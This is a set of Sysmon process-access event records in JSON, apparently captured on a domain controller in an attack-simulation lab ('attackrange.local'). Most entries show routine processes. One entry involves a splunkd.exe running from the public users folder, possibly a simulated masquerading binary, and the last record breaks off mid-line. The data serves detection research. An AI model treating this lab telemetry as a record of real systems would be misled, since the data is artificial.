{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-00103D380600}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-00103D380600}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.177\r\nSourceProcessGUID: {E2A3D6B1-1187-5F25-0000-00103D380600}\r\nSourceProcessId: 3356\r\nSourceThreadId: 5080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.177","SourceProcessGUID":"{E2A3D6B1-1187-5F25-0000-00103D380600}","SourceProcessId":"3356","SourceThreadId":"5080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.505\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 